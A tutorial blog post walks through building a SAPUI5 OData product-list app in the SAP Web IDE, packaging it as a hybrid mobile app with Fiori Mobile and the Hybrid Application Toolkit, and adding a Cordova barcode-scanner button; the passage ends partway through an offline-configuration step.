Because of the nature of filter streams, it is relatively straightforward to add decompression services to the FileDumper program last seen in Chapter 7. Generally, you’ll want to decompress a file before dumping it. Adding decompression does not require a new dump filter. Instead, it simply requires passing the file through an inflater input stream before passing it to one of the dump filters. We’ll let the user choose from either gzipped or deflated files with the command-line switches -gz and -deflate. When one of these switches is seen, the appropriate inflater input stream is selected; it is an error to select both. Example 9.15, FileDumper4 , demonstrates. Example 9-15. FileDumper4 import java.io.*; import java.util.zip.*; import com.macfaq.io.*; public class FileDumper4 { public static final int ASC = 0; public static final int DEC = 1; public static final int HEX = 2; public static final int SHORT = 3; public static final int INT = 4; public static final int LONG = 5; public static final int FLOAT = 6; public static final int DOUBLE = 7; public static void main(String[] args) { if (args.length < 1) { System.err.println("Usage: java FileDumper4 [-ahdsilfx] [-little]"+ "[-gzip|-deflated] file1..."); } boolean bigEndian = true; int firstFile = 0; int mode = ASC; boolean deflated = false; boolean gzipped = false; // Process command-line switches. for (firstFile = 0; firstFile < args.length; firstFile++) { if (!args[firstFile].startsWith("-")) break; if (args[firstFile].equals("-h")) ... No credit card required
https://www.oreilly.com/library/view/java-io/1565924851/ch09s06.html
CC-MAIN-2019-26
refinedweb
238
57.87
31 July 2012 09:18 [Source: ICIS news] SINGAPORE (ICIS)--LG Chem is planning to conduct test-runs at its new phenol/acetone plant in ?xml:namespace> The plant, with a nameplate capacity of 300,000 tonnes/year of phenol and 180,000 tonnes/year of acetone, is still under construction, the source said, adding that the construction of the plant will be completed in September. No details were given on the start and the cost of the construction. LG Chem is targeting commercial production at the new facility on 1 November, the source said. The upcoming new capacity is expected to exert downward pressure on phenol and acetone prices, given weak demand amid a slowing
http://www.icis.com/Articles/2012/07/31/9582232/lg-chem-to-test-run-daesan-phenolacetone-plant-on-1.html
CC-MAIN-2014-42
refinedweb
116
58.21
Forum:May 25th - Towel Day Reskin? From Uncyclopedia, the content-free encyclopedia On May 25th we'll celebrate "Towel Day" - in memory of Douglas Adams. How about a nice in his memory? Could be quite simple, a picture of towel and some text to go along, or just a huge 42 in the center of the screen. Any thoughts? ~ 12:03, 8 May 2007 (UTC) - Here's one: The surest way of seeing a reskin made is by working on it yourself. :) —Major Sir Hinoa prepare for trouble • make it double? 12:05, 8 May 2007 (UTC) - True, but considering the fact that I have no design/graphic ability whatsoever....`tis a bit or a problem. I usually use the kind services of Modusoperandi dry humor designs inc.. 12:50, 8 May 2007 (UTC) - Just about anything in memory of the great man would be worthwhile. RabbiTechno 12:06, 8 May 2007 (UTC) I agree. TOWEL DAY RESKIN IS A MUST.... i'll do it if necessary so sayeth Sliferjam ~ Talk * Sock * Jam * Gallery * Fearless Fosdick? 21:07, 8 May 2007 (UTC) - Both good, personally I prefer DNATater. RabbiTechno 16:48, 9 May 2007 (UTC) - How about one with Marvin the Paranoid Android? Or was it Morally Depressed Android? --Lt. Sir Orion Blastar (talk) 18:16, 9 May 2007 (UTC) How's this?)}" > 18:48, 9 May 2007 (UTC) - Good but I like the Classic Marvin better. I heard the original Marvin suit got destroyed except for the head, and they had to create a new Marvin for the movie. I guess they went the Teletubby way when Disney produced the movie to appeal to kids, and took "Brain the size of a planet" too literally and gave him a big head. Good enough anyway, I like your version. --Lt. Sir Orion Blastar (talk) 20:43, 9 May 2007 (UTC) Great idea. Much as I like all the attempts, I'm for DNATater. Perhaps the others could replace the logos in other namespaces or something. --Nerd42eMailTalkUnMetaWPediah2g2 19:22, 9 May 2007 (UTC) Much as I'd love to pretend we're endorsed by DNA himself, I think that one's a bit too obvious - I vote for the GreenTater for the subtlety (only with added "Don't Panic" stolen from DNATater). Otherwise, just let it all out and call it "We're doing a tribute to Douglas Adams today" Day. --Whhhy?Whut?How? *Back from the dead* 19:44, 9 May 2007 (UTC) - Whatever logo gets picked, I hope towels are involved somewhere on the main page. "Uncyclopedia, the hoopy-frood encyclopedia that knows where its towel is." (It'd be an awful shame if someone goes to a lot of work on a reskin to tribute Douglas Adams on Towel Day without mentioning towels) -:29, 10 May 2007 (UTC) So, who is the admin to talk with? ~ 08:12, 10 May 2007 (UTC)
http://uncyclopedia.wikia.com/wiki/Forum:May_25th_-_Towel_Day_Reskin%3F
CC-MAIN-2015-32
refinedweb
484
73.07
A simple form-builder with drag & drop to help you deal your own form A simple form-builder with drag & drop to help you deal your own form. Less code in development and your site will be more generic, configurable. vue-form-builder A simple form-builder with drag & drop to help you deal your own form. Less code in development and your site will be more generic, configurable. Advantages: - Less code in development - Wide range of APIs - Easily to maintain, update later - Easily to config your form (drag & drop, control settings) - Extensibility (Extend-able): Help you to import your own Control - Validation & Custom Control Validation Supported. - ... Fully documentation in this Repo's Wiki. Check it out! Give this repo a ⭐ (star) if you actually like this and will use it for your development/production :D! Thank you! The library is built & ready for production but if you meet any bugs or issues, feel free to open! Demo Online: Demo Project: Current version Current latest version of the Vue Form Builder: 1.4.0. Updated/Features: - Refactored most code, easily to read, develop & maintain now. - Able to add more control (extendable) - Fix some minor bugs - Update devDependency that got security problem. Technologies/Libraries using - Javascript - VueJS 2.x - Webpack - JQuery/JQuery UI - Bootstrap 4 - ... Note: From the version 1.2.0 to above, I don't import bootstrap 4 stylesheet into the bundle, you should include your own bootstrap 4 stylesheet in order to get both of GUI & Template working normally. Form Builder Structure Template: is where you can config/create/edit your own form. GUI: is where the form will be built by your configuration. For more information please visit this Repo's wiki, thanks :D! How to install? Run this command to install: npm i v-form-builder --save NPMJS: Notes: - For the best experience, please install the latest version! - Please don't install the old version below v1.1.1. Thank you! How to implement? Import into your project 1/ Import as global component import FormBuilder from 'v-form-builder'; Vue.component('FormBuilder', FormBuilder); 2/ Import as single component import FormBuilder from 'v-form-builder'; export default { components: {FormBuilder} ... } Note: you should have your own Bootstrap 4 stylesheet imported inside your project in order to use the Form Builder normally. Usage <template> <div> // form builder template <form-builder</form-builder> // form builder gui <form-builder</form-builder> </div> </template> Binding options: - type (String): - Form Config (Template): template - Form GUI: gui - form (Object) - for Form GUI Only, where you passing the configuration data and the Form Builder will build the form by your configuration data. V-Model for Form Builder Template You can use v-model in Form Builder Template, it'll return to you the form configuration data that you're configurated (object) and also render the old configuration and let you edit/update that configuration. <template> <div> <form-builder</form-builder> </div> </template> The form config data would look like this: { sections: [...], layout: "...", _uniqueId: "..." } Ideally, you need to convert that Object to JSON string and then save it in your database :D V-Model for Form Builder GUI You can use V-Model to get/set values from your built form. <template> <div> <form-builder</form-builder> </div> </template> The form values data would look like this: { section_key: { control_name_1: "data", control_name_2: 123, ... }, ... } APIs Please visit this Repo's Wiki. Release notes - Version 1.4.0: - Refactored, the code is more easy to view & read. - Able to extend a custom control. - Fix some minor bugs. - Version 1.3.0: - Milestone 3 released. - Able to validate the form. - Able to styling the label (bold, italic, underline). - Able to set control label position for Section (horizontal or vertical) - Fix some bugs - Constraints for some Hooks - APIs for Validate - Version 1.2.1: - Fix some minor bugs. - Version 1.2.0: - Hooks are available now for both Template & GUI. - More options for controls, like: - Select: Ajax data source (URL) - Date Picker: date format - Time Picker: time format - Update control: - Number Control to work properly with the decimal places. - Time Picker: change to another time picker with a better APIs + options. - Fix a problem that make the Date Picker icon didn't show. - Stop import Bootstrap 4 CSS into the bundle. - Version 1.1.1: - First Release of Vue Form Builder - Able to config form & render form by config data. - Get/set value for both GUI & Template. Supporting the project If you really like this project & want to contribute a little for the development. You can buy me a coffee. Thank you very much for your supporting <3.
https://codespots.com/library/item/1234
CC-MAIN-2021-04
refinedweb
767
65.93
Bug #14889 TracePoint for :line never seems to trigger on argument list. Maybe by design? Description I have the following code. 30 1| def print_summary( 31 0| output = $stdout 32 | ) In the margin is the line number followed by the number of hits according to :line trace point. I feel like line 31 should also trigger a line trace point. It's an argument, but it must be executed. Maybe a different trace point? :argument? History Updated by ioquatix (Samuel Williams) about 1 year ago If this is by design, please feel free to close, but as it stands there is no way to check if optional argument evaluation occurred or not. For code coverage, this is a limitation. Updated by mame (Yusuke Endoh) about 1 year ago I'm unsure about your assumption. If you can insert a newline freely, you may want to write the following code: 30 1| def print_summary( 31 | output = ( 32 0| $stdout 33 | ) 34 | ) You can hook Line 32 as a :line event. We usually write an optional argument in a line: def print_summary(out = $stdout). I don't think it is a good idea to deal with such a code as a :line event because for def foo(x = 1, y = 2) we cannot distinguish x event and y event. As you say, if we really need this, we should add a new event type like :argument, but we need to design its API carefully based on actual use cases. Updated by shevegen (Robert A. Heiler) about 1 year ago I don't have anything overly helpful to the discussion to add; but I wanted to add one thing to this: We usually write an optional argument in a line: def print_summary(out = $stdout) While I concur in general, I myself have experimented a little with layout such as: def foo( a = 'foo', b = 'bar', ) The reason was primarily because it is, for my bad eyesight, easier to assess which arguments are used; I only have to look at the left hand side mostly. Makes it easier for me to keep track what is going on. This may be a rare layout perhaps, but coming from this, I understand where Samuel is coming from (but this is not me saying anything pro or con on the suggestion itself; I really only wanted to comment on spaced-out optional arguments). On a side note that may not be very relevant either, one can add strings to ')' such as: def foo( i = 'bar' )"hello world!" puts i end foo :-) I don't even know if that is a bug or a feature or something totally irrelevant. I just found it funny and golfing-worthy (even though I am a horrible code golfer). Almost a bit like python doc strings! :D Also available in: Atom PDF
https://bugs.ruby-lang.org/issues/14889
CC-MAIN-2019-39
refinedweb
470
68.1
>>>>> "John" == John Kitchin <jkitchin@...> writes: John> Could these kinds of things be done in/with matplotlib? Or John> more importantly, does a framework in matplotlib exist that John> this kind of thing could be developed? I am interested in John> talking to anyone who has thoughts about this. Basically, you will want to read up on matplotlib event handling. Resources * user's guide section "event handling" in the pylab chapter * class documentation for Events at. * wiki entry at * Example escripts picker_demo.py poly_editor.py JDH John Hunter wrote: >>>>>>"Andrew" == Andrew Straw <strawman@...> writes: >>>>>> >>>>>> > > Andrew> So I modified nat.py in the following way, and it now > Andrew> works. And there was much rejoicing! > >Anyone want to volunteer for a wiki entry on this one? It comes up a >lot... > >JDH > > John: I was thinking about putting together a natgrid toolbox, which would provide a function similar to matlab's griddata. This would building a new python interface to the natgrid c lib, since LLNL's license is too restrictive. The natgrid lib itself is GPL, which I think precludes it from being included in matplotlib proper. What do you think? : >>>>> "Andrew" == Andrew Straw <strawman@...> writes: Andrew> So I modified nat.py in the following way, and it now Andrew> works. And there was much rejoicing! Anyone want to volunteer for a wiki entry on this one? It comes up a lot... JDH >>>>> "Samuel" =3D=3D Samuel GARCIA <sgarcia@...> writes: Samuel> I am new (futur) of pylab, I use a debian sid Samuel> (unstable) with this source.list : deb Samuel> [1] packages/ deb-src Samuel> [2] sources/ I try it Samuel> few 2 mouths ago and it worked, I have just updated all Samuel> and now it does nit worked. Sorry if the answer is in Samuel> archive, I did'nt find it. I have this message with from Samuel> pylab import * : This is a problem with your debian packaging system, and unfortunately is outside our ability to help. I would report this to Vittorio, the debian package maintainer. gtk recently started using cairo as its rendering engine, and it appears one of your package is linking to it but it is not provided, so it looks like a debian dependency error. JDH Samuel> -------------------------------------------------------------= --------- Samuel> ----- exceptions.ImportError Traceback (most recent call Samuel> last) /home/sgarcia/<console> Samuel> /usr/lib/python2.3/site-packages/pylab.py -3 from Samuel> matplotlib.pylab import * Samuel> /usr/lib/python2.3/site-packages/matplotlib/pylab.py 197 Samuel> 198 from axes import Axes, PolarAxes --> 199 import backends Samuel> 200 from cbook import flatten, is_string_like, Samuel> exception_to_str, popd, \ 201 silent_list, iterable, Samuel> enumerate Samuel> /usr/lib/python2.3/site-packages/matplotlib/backends/__init__= .py Samuel> 53 # a hack to keep old versions of ipython working with Samuel> mpl after bug 54 # fix #1209354 55 if 'IPython.Shell' in Samuel> sys.modules: ---> 56 new_figure_manager, draw_if_interactive, show =3D Samuel> pylab_setup() 57 Samuel> /usr/lib/python2.3/site-packages/matplotlib/backends/__init__= .py Samuel> in pylab_setup() 22 backend_name =3D Samuel> 'backend_'+backend.lower() 23 backend_mod =3D Samuel> __import__('matplotlib.backends.'+backend_name, ---> 24 Samuel> globals(),locals(),[backend_name]) 25 26 # Things we Samuel> pull in from all backends Samuel> /usr/lib/python2.3/site-packages/matplotlib/backends/backend_= gtkagg.py Samuel> 8 from matplotlib.figure import Figure 9 from backend_agg Samuel> import FigureCanvasAgg ---> 10 from backend_gtk import gtk, FigureManagerGTK, Samuel> FigureCanvasGTK,\ 11 show, draw_if_interactive,\ 12 Samuel> error_msg_gtk, NavigationToolbar, PIXELS_PER_INCH, Samuel> backend_version, \ Samuel> /usr/lib/python2.3/site-packages/matplotlib/backends/backend_= gtk.py Samuel> 20 from matplotlib.backend_bases import RendererBase, Samuel> GraphicsContextBase, \ 21 FigureManagerBase, Samuel> FigureCanvasBase, NavigationToolbar2, cursors ---> 22 from matplotlib.backends.backend_gdk import RendererGDK, Samuel> FigureCanvasGDK 23 from matplotlib.cbook import Samuel> is_string_like, enumerate 24 from matplotlib.figure import Samuel> Figure Samuel> /usr/lib/python2.3/site-packages/matplotlib/backends/backend_= gdk.py Samuel> 32 from matplotlib.backends._na_backend_gdk import Samuel> pixbuf_get_pixels_array 33 else: ---> 34 from matplotlib.backends._nc_backend_gdk import Samuel> pixbuf_get_pixels_array 35 36 ImportError: Samuel> libpangocairo-1.0.so.0: Ne peut ouvrir le fichier d'objet Samuel> partag=E9: Aucun fichier ou r=E9pertoire de ce type Samuel -- Samuel> Samuel GARCIA CNRS - UMR5020 Universite Claude Bernard Samuel> LYON 1 Laboratoire des Neurosciences et Systemes Samuel> Sensoriels 50, avenue Tony Garnier 69366 LYON Cedex 07 04 Samuel> 37 28 74 64 Samuel> ------------------------------------------------------- Samuel> This SF.Net email is sponsored by: Power Architecture Samuel> Resource Center: Free content, downloads, discussions, and Samuel> more. Samuel> _______________________________________________ Samuel> Matplotlib-users mailing list Samuel> Matplotlib-users@... Samuel> Samuel> References Samuel> 1. Samuel> 2. Your error occurs much more recently than the glyph one that occupies your subject Python 2.3.4 (#1, Feb 2 2005, 12:11:53) [GCC 3.4.2 20041017 (Red Hat 3.4.2-6.fc3)] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> from pylab import * >>> from data_helper import get_daily_data Traceback (most recent call last): File "<stdin>", line 1, in ? ImportError: No module named data_helper It looks like you have not downloaded the data_helper module from the web site, that this example uses. You'll also need to download the data files as well ... >>> grid(True) >>> >>> show() Traceback (most recent call last): File "/usr/lib/python2.3/site-packages/matplotlib/backends/backend_gtk.py", line 318, in expose_event You should not use show from interactive mode. Try reading and JDH >>>>> "Willi" == Willi Richert <w.richert@...> writes: >>>>> "Willi" =3D=3D Willi Richert <w.richert@...> writes: Willi> Hi, Willi> #!/usr/bin/python Willi> from scipy import * from pylab import * Willi> MAX_TIME =3D 7000 Willi> fn_social=3D"all-avg.dat" Willi> def readStats(fn): q =3D [d for d in io.read_array(fn) if Willi> d[0]<=3DMAX_TIME] Willi> print q t=3D[s[0] for s in q] Willi> age=3D[s[1] for s in q] age_conf=3D[s[2] for s in q] Willi> wp=3D[s[3] for s in q] wp_conf=3D[s[4] for s in q] Willi> return t, age, age_conf, wp, wp_conf Willi> hold(True) Willi> t, age, age_conf, wp, wp_conf =3D readStats(fn_social) Willi> xlabel('time [s]') ylabel('average lifetime [s]') Willi> errorbar(t,wp,yerr=3Dwp_conf, color=3D"blue",ecolor=3D"black", Willi> mfc=3D'red', mec=3D'green', ms=3D200, mew=3D4) Willi> show() Willi> Am Freitag, 14. Oktober 2005 16:05 schrieb John Hunter: >> >>>>> "Willi" =3D=3D Willi Richert <richert@...> writes: >>=20 Willi> Thanks, that helped! Switching to QtAgg did the trick. Willi> However, I have still some issues: 1) the text placement of Willi> the titles does not really work: Willi> >> Willi> 2) The confidence intervals are only vertical lines. I Willi> would like to have some small horizontal "stoppers" at the Willi> upper and lower point of those error bars. Is that Willi> possible with matplotlib? >>=20 >>=20 >> Could you post the script -- hard to debug in a vacuum. >>=20 >> JDH >>=20 >>=20 >> ------------------------------------------------------- This >> SF.Net email is sponsored by: Power Architecture Resource >> Center: Free content, downloads, discussions, and >> more. >> _______________________________________________ >> Matplotlib-users mailing list >> Matplotlib-users@... >> Willi> -- Dipl.-Inform. Willi Richert C-LAB - Cooperative Willi> Computing & Communication Laboratory der Universit=E4t Willi> Paderborn und Siemens Willi> FU.323 F=FCrstenallee 11 D-33102 Paderborn Tel: +49 52 51 60 Willi> - 61 20 Fax: +49 52 51 60 - 60 65 E-Mail: richert@... Willi> Internet: Willi> ------------------------------------------------------- Willi> This SF.Net email is sponsored by: Power Architecture Willi> Resource Center: Free content, downloads, discussions, and Willi> more. Willi> _______________________________________________ Willi> Matplotlib-users mailing list Willi> Matplotlib-users@... Willi> On 10/14/05, Mark Bakker <markbak@...> wrote: > > Hello all - > > I finally found time to fix the axis('scaled') feature. > It is now consistent when zooming, as requested. > In essence, it works the same as axis('equal'), but fixes the > lower-left-hand corner rather than the center of the > subplot. When using axis('scaled') the _autoscaleon is > set to False, so that axis limits will be fixed when > features are added to the figure. You can overwrite this > by setting it the regular way (also works for axis('equal')) > ax.set_autoscale_on(False). > > My last modification is a prototype implementation of > zooming when two axes are linked. The idea behind this > is that when an axis is 'equal' or 'scaled' and another > axis is linked to this axis, that when you are zooming and > changing the size of the subplot, then the size of the > linkes axis should change accordingly. I use this when > I am contouring 2D horizontal data and have a vertical > cross-section linked to the x-axis of the horizontal plot. > When I zoom in on the horizontal plot, the length of the > linked axis now gets changes too! Works great, actually, > but has been implemented for linked x-axis only for now. > It works when zooming in the horizontal data (which > has axis 'equal'), but not yet when zooming in the > linked vertical cross-section. Still working on it. Hi, yes this is a step in the right direction! IMO it would also be nice with functionality for zooming in/out on single clicks with the left and right button, e.g. something like the below for backend_bases.py: (hope it is not wrapped to death...) Helge <pre> ... def release_zoom(...): ... # single click: 5 pixels is a threshold if abs(x-lastx)<5 or abs(y-lasty)<5: lastx, lasty =3D a.transData.inverse_xy_tup( (lastx, lasty) ) x, y =3D a.transData.inverse_xy_tup( (x, y) ) Xmin,Xmax=3Da.get_xlim() Ymin,Ymax=3Da.get_ylim() if self._button_pressed =3D=3D 1: # zoom in by 20%, make point clicked center dx=3D(Xmax-Xmin)*0.8*0.5 dy=3D(Ymax-Ymin)*0.8*0.5 a.set_xlim((x-dx, x+dx)) a.set_ylim((y-dy, y+dy)) elif self._button_pressed =3D=3D 3: # zoom out by 20%, make point clicked center dx=3D(Xmax-Xmin)*1.2*0.5 dy=3D(Ymax-Ymin)*1.2*0.5 a.set_xlim((x-dx, x+dx)) a.set_ylim((y-dy, y+dy)) self.draw() self._xypress =3D None self._button_pressed =3D=3D None self.push_current() self.release(event) return # zoom to rect ... </pre> I agree to receive quotes, newsletters and other information from sourceforge.net and its partners regarding IT services and products. I understand that I can withdraw my consent at any time. Please refer to our Privacy Policy or Contact Us for more details
https://sourceforge.net/p/matplotlib/mailman/matplotlib-users/?viewmonth=200510&viewday=17
CC-MAIN-2017-04
refinedweb
1,715
59.19
Test::PureASCII - Test that only ASCII characteres are used in your code(); This module allows to create tests to ensure that only 7-bit ASCII characters are used on Perl source files. The functions available from this module are described next. All of them accept as first argument a reference to a hash containing optional parameters. The usage of those parameters is explained on the Options subchapter. checks that $filename contains only ASCII characters. The optional argument $test_name will be included on the output when reporting errors. find all the Perl source files contained in directories @dirs recursively and check that they only contain ASCII characters. blib is used as the default directory if none is given. find all the files (Perl and non-Perl) contained in directories @dirs recursively and check that they only contain ASCII characters. The current directory is used as the default directory if none is given. All the functions from this module accept the following options: @list_of_files can contain any combination of string and references to regular expressions. Files matching any of the entries will be skipped. For instance: all_files_are_pure_ascii({ skip => [qr/\.dat$/] }); On Perl files, skip any __DATA__ section found at the end. Tests fail when any control character that is not tab, CR neither LF is found. Tests fail when tab characters are found. Tests fail when carriage return (CR) characters are found. That can be useful when you want to force people working on your project to use the Unix conventions for line endings. Test fail when any CR or LF not being part of a CRLF sequence is found. That can be useful when you want to stick to Windows line ending conventions. The module recognizes some sequences or hints on the tested files that allow to skip specific exceptions. Usually you would include them as Perl comments. the line where this token is found is not checked for pure-ascii the line where this token is found and the following $n are skipped the test for this file ends when this token is found A nice table containing Unicode and Latin1 codes for common (at least in Europe) non-ASCII characters is available.
http://search.cpan.org/~salva/Test-PureASCII-0.02/lib/Test/PureASCII.pm
CC-MAIN-2015-06
refinedweb
363
64.2
Back to Getting Started With Kapsel SAP Web IDE, Fiori Mobile and the Hybrid Application Toolkit(HAT) See also, Creating an Offline CRUD hybrid mobile app in SAP Web IDE Full-Stack with Hybrid Application Toolkit and End of Maintenance for Hybrid App Toolkit local add-on. The SAP Web IDE provides a browser based integrated development environment(IDE) for creating SAPUI5 web based applications that additionally can be extended to support hybrid apps through Fiori Mobile and the Hybrid Application Toolkit(HAT). Hybrid applications display their UI with HTML but enable access to native functionality such as accessing the device’s contacts or scanning a barcode through a JavaScript API that each plugin provides. This enables the same application to run on Android, iOS and Windows with no or minimal code changes. This blog post will demonstrate how to create a SAPUI5 OData based application using the SAP Web IDE and then deploy it as a hybrid app using Fiori Mobile and the HAT. SAP Web IDE Fiori Mobile (Cloud Builds) Hybrid Application Toolkit(HAT) and the Companion App Enhance the app with a Barcode Scanner Hybrid Application Toolkit(HAT) and Local Builds Offline Enabling the Application Alternate Method of Offline Enabling the Application Updating a Deployed Hybrid App with the AppUpdate plugin (Deploy to CP mobile services) SAP Web IDE Some additional tutorials on the SAP Web IDE at SAP Tutorial Navigator are listed below. Enable the Web IDE in the SAP Cloud Platform Create a Destination in SAP Cloud Platform Note there are a series of videos included in the Learning Center area shown below of the Web IDE. This section will demonstrate how to create and run a web application using the SAP Web IDE. This example will use the OData service that is included in Mobile Service for Development and Operations. - Open the Development and Operations cockpit. Under Developer the sample OData service is available. Note, you may need to press the button to reset the data to the initial state if you are seeing no data or are seeing data with mixed languages.This OData service can be accessed by the following URL after correcting the XXXXXXX values. This OData service is useful as it provides each user with their own OData service whose values can be updated and easily reset. - Next, create a destination to this OData service in the SAP Cloud Platform Cockpit. - Open the SAP Web IDE by clicking on the following link. Navigate to Services and the SAP Web IDE. Enable it if it is not already enabled. Note, that there is a new Web IDE available named Multi-Cloud Version. This blog post currently uses the older SAP Web IDE. Click on Open SAP Web IDE. - In the SAP Web IDE, under Tools, Preferences enable the below plugins. and - Create a project from template via the File, New, Project from Template menu. Select SAP Fiori Worklist Application. Specify the project name to be Productlist. Select the Data Connection as shown below. Specify the application settings and bindings as shown below. Run the application. Note a few minor changes were made to the labels as described below. - A few minor tweaks can be made to the application. - Modify the i18n.properties file and tweak some of the names to be more descriptive. worklistViewTitle=Products worklistTableTitleCount=Products Found ({0}) tableNameColumnTitle=Product tableUnitNumberColumnTitle=Price objectTitle=Product Details - Optionally modify Component.js below the this.setModel call and add the below code which will cause the OData requests to be made individually rather than as batch requests. this.getModel().setUseBatch(false); - Modify Object.view.xml and change the ObjectHeader to display different content. <ObjectHeader id="objectHeader" title="{LongDescription}" number="{ path: 'Weight', formatter: '.formatter.numberUnit' }" numberUnit="{WeightUnit}"> </ObjectHeader> - Note, when the HAT plugin is enabled, an additional setting appears when running the app as shown below. Enabling this will include the JavaScript files added by Cordova plugins enabling additional mobile qualities such as being able to scan a barcode. Fiori Mobile (Cloud Builds) This section will demonstrate how the previous application can be packaged as a hybrid application and will use the Fiori Mobile build service to build the application. The following are some related links on the topic. SAP Fiori Demo Cloud takes on a mobile focus What’s new in the SAP Web IDE Hybrid App Toolkit, 1703 How to use SAP HCP, mobile service for SAP Fiori Mobile Service for SAP Fiori The Fiori mobile service developer experience has arrived! The Fiori Mobile Service has a link to Go to Admin Console, which has the following Getting Started link. For Fiori Mobile to package the application as a hybrid app it must first be deployed to the SAP Cloud Portal. - In the SAP Cloud Platform Cockpit enable the following two services. - Click on the Portal service tile then click on Go to Service. Click on Create New Site choose SAP Fiori Launchpad as the template. Select the site and make sure it is published and set to be the default. - Optionally, right click on the previously created project and choose Fiori Mobile, Select Cordova Plugins and optionally add any additional plugins desired. - Right click on the Productlist project and choose Deploy, SAP Cloud Platform and register it to the SAP Fiori Launchpad. - Here is the app running in the SAP Fiori Launchpad. The URL can also be found in the Portal Service cockpit. - Right click on the Productlist project and choose Fiori Mobile, Build, Build Packaged App. When using the SAP Cloud Platform trial, a maximum of two apps can be created. The following instructions describe how to delete a previously deployed Fiori Mobile app. Note, the Companion App is covered in the next section but basically adds a refresh button in the top right that when pressed will reload the HTML resources of the app. In the Companion App the HTML and JavaScript files are not included in the app but are loaded from the SAP Fiori Launchpad enabling changes to be tested by simply reloading the page rather than requiring a rebuild and redeploy. Building a packaged app creates an apk(Android) or ipa(iOS). The Packaging tab chooses between having a single app or an app that has a launchpad with a tile for each app. Note you need to double click on an available app to move it to the Selected Applications table. The below screenshot is an example of multiple tiles being shown in a launchpad. Push notification support can be added to the application. The console shows the build process which is happening in the SAP Fiori Mobile clould build service. Once the build is complete the apk file can be downloaded by clicking on the Productlist.apk link. Note, the above screen can be reopened by choosing the Show Build Results menu item. After the apk file has been downloaded it can be installed onto an Android device with the below command. adb install Productlist.apk The QR code contains the below URL which shows the app on Mobile Place. The app can also be installed directly by pressing the INSTALL button. Building a Packaged app will also create a non-editable application for the app in the Development and Operations cockpit. This app configuration can be edited (or deleted) in the Fiori Mobile Admin Console. Note the delete button becomes enabled after deleting any entries shown below that are not in a Ready to build status. - Here is the app that is deployed to the device. Note this app is a packaged app and contains many of the same plugins that are included in the SAP Fiori Client which provide a passcode screen and enable the app to access native functionality through JavaScript calls. The passcode policy can be set in the Mobile Secure Admin Console as shown below. The screen shot below shows the WebInspector invoking the device plugin to find information about the Android device the app is being run on. Note also that all the files that make up the app are loaded from file://. - After following the above steps, a hybrid application has been built in the cloud and then installed on an mobile device using the Fiori Mobile build service. The deployed app can be a single app or it can display a local launchpad allowing access to multiple Fiori apps. The app can also make use of mobile qualities such as receiving push notifications or many of the other mobile qualities available via Cordova and Kapsel plugins. For additional details on push see Easily add Push Notifications to your mobilised Fiori app with Fiori Mobile DevX Hybrid Application Toolkit(HAT) and the Companion App The following instructions describe how to install the HAT components onto your computer that enable the deployment to the companion app or as discussed in the next section how to create and build a local project. The companion app shown above is a prebuilt app that includes common Cordova and Kapsel plugins and can be configured to load a URL. When a hybrid app is run in the companion app, changes can be made in the Web IDE and then seen in the companion app by simply double tapping and pressing the refresh button. It can be built locally which enables the debugging of JavaScript through the Web Inspector or a non debuggable version is available at the app stores. SAP Hybrid App Tool Companion at Google Play Store SAP Hybrid App Tool Companion at Apple iTunes The following are some additional links on the topic. Installing and Setting Up HAT How to install Hybrid Application Toolkit on Windows How to use Hybrid Application Toolkit (HAT) and test the apps - Download the installer from store.sap.com. - Run SAP_HAT_local-1.25.3\setup.cmd The above screen checks the versions of the various required components. Each version of HAT is tested to work with specific versions of Node, Cordova and the Kapsel SDK. The version of node, Cordova and Kapsel can be determined by running the following commands. node -v cordova -v kapsel -v The check for the node version occurs in SAP_HAT_local_1_25_3\setup\scripts\win\check_env.cmd The following are some commands to uninstall and install a specific Cordova version. npm uninstall -g cordova npm cache clean npm install -g cordova@6.3.1 Finally, the version of Kapsel can be determined by the following items. echo %KAPSEL_HOME% C:\SAP\MobileSDK3\KapselSDK The Kapsel command line interface (CLI) is installed with the following command. cd %KAPSEL_HOME%\cli npm install -g - The following screen downloads a copy of SAPUI5 that will be included in applications that use the local build and configures the HAT Connector that enables communication between the Web IDE and the build environment installed on your computer. Note that on step 3, the URL for the Web IDE needs to be provided. - Finally the Companion App is built which is an application that contains many of the Cordova and Kapsel plugins commonly used in a hybrid app. Applications can be deployed to this pre-built companion app reducing the time needed to build and deploy a Cordova app during development. - Once the HAT install completes, start the HAT Connector. - Enable the HAT Local Add-on and connect to the HAT Connector in the SAP Web IDE via the Tools, Preferences menu. - Modify the index.html file and change the setting frameOptions setting to be allow rather than trusted. For further details see Frame Options. - Run the application in the Companion App. Note, that the app being run in the Companion App is loaded over the internet rather than loading the HTML and JavaScript content locally from a file:// URL. This enables the development/deployment cycles to be quick as the APK file does not need to be rebuilt and reinstalled after making a change to the HTML or JavaScript of the application. - Note the companion app is a hybrid app and the list of plugins included in it can be seen as shown below. You may wish to remove the privacy screen plugin which on Android prevents screen mirroring with apps such as Vysor. cordova plugin remove cordova-plugin-privacyscreen Enhance the app with a Barcode Scanner This next section demonstrates a simple change to the application that adds the ability to scan a QR code and have the returned value be placed in the Search field. This change can be quickly applied and tested in the Companion app without having to rebuild and redeploy the application. - Edit Worklist.view.xml. After SearchField, add the following button. <content> <Button id="barcodebutton" icon="sap-icon://bar-code" press="onBarcodeScan"></Button> </content> - Edit Worklist.controller.js and add the following method. onBarcodeScan: function() { var that = this; var code = ""; if (!cordova.plugins.barcodeScanner) { sap.m.MessageBox.alert("Barcode scanning not supported"); return; } cordova.plugins.barcodeScanner.scan( function(result) { code = result.text; that.getView().byId("searchField").setValue(code); var oTableSearchState = []; var sQuery = result.text; if (sQuery && sQuery.length > 0) { oTableSearchState = [new Filter("Name", FilterOperator.Contains, sQuery)]; } that._applySearch(oTableSearchState); }, function(error) { sap.m.MessageBox.alert("Scan failed: " + error); } ); }, - Notice that the change can quickly be tested by double tapping in the Companion App and choosing the refresh button. Notice the barcode scanner button now appears to the right of the search field. - If the Refresh is failing, the following trick might help. In the Chrome Web Inspector (chrome://inspect), switch to the Network tab and disable the cache. Then select the Refresh menu again. Hybrid Application Toolkit(HAT) and Local Builds - Right click on the Productlist project, choose Project Settings, Hybrid App Toolkit, Hybrid App Configuration (Local Add-on). Specify an App ID such as com.sap.productlist. - Under the Plugins section check the Logon Manager, Offline OData, Barcode Scanner and under Cordova select Network Connection. Select SAP Cloud Platform mobile services. Under Logon Options, the Logon screen can be further customized. - Under OData Endpoint, select SAP Cloud Platform mobile services. - In the Mobile Service for Development and Operations cockpit create a new application with an App ID of com.sap.productlist. Set the security configuration to be Basic. Set the Endpoint 